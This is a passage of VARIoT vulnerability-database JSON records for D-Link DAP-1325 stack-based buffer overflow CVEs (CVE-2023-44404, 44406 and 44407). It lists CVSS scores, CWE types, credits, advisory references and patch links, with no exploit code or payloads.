"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1504/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-44406"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"db": "VULMON",
"id": "CVE-2023-44406"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"db": "VULMON",
"id": "CVE-2023-44406"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"date": "2025-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"date": "2024-05-03T03:15:53.613000",
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"date": "2025-03-13T04:56:00",
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"date": "2025-03-12T17:41:01.260000",
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
}
],
"trust": 0.8
}
}
VAR-202310-0139
Vulnerability from variot - Updated: 2025-11-26 22:59D-Link DAP-1325 get_value_from_app Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18823. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202310-0139",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1502"
}
],
"trust": 0.7
},
"cve": "CVE-2023-44404",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29318",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44404",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44404",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44404",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-44404",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-44404",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-44404",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-44404",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29318",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 get_value_from_app Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18823. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-44404"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"db": "CNVD",
"id": "CNVD-2025-29318"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-44404",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1502",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18823",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29318",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"id": "VAR-202310-0139",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29318"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29318"
}
]
},
"last_update_date": "2025-11-26T22:59:20.644000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DAP-1325 get_value_from_app stack buffer overflow remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757421"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29318"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1502/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-44404"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"date": "2025-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"date": "2024-05-03T03:15:53.260000",
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1502"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29318"
},
{
"date": "2025-03-13T04:35:00",
"db": "JVNDB",
"id": "JVNDB-2023-028361"
},
{
"date": "2025-03-12T17:40:55.227000",
"db": "NVD",
"id": "CVE-2023-44404"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028361"
}
],
"trust": 0.8
}
}
VAR-202310-0112
Vulnerability from variot - Updated: 2025-11-26 22:58D-Link DAP-1325 SetAPLanSettings Gateway Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18826. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support wired/wireless network switching or connection to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202310-0112",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1505"
}
],
"trust": 0.7
},
"cve": "CVE-2023-44407",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29321",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44407",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44407",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44407",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-44407",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-44407",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-44407",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-44407",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29321",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 SetAPLanSettings Gateway Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18826. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support wired/wireless network switching or connection to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-44407"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"db": "CNVD",
"id": "CNVD-2025-29321"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-44407",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1505",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18826",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29321",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"id": "VAR-202310-0112",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29321"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29321"
}
]
},
"last_update_date": "2025-11-26T22:58:30.458000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DAP-1325 SetAPLanSettings Stack Buffer Overflow Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757436"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29321"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1505/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-44407"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"date": "2025-03-24T00:00:00",
"db": "JVNDB",
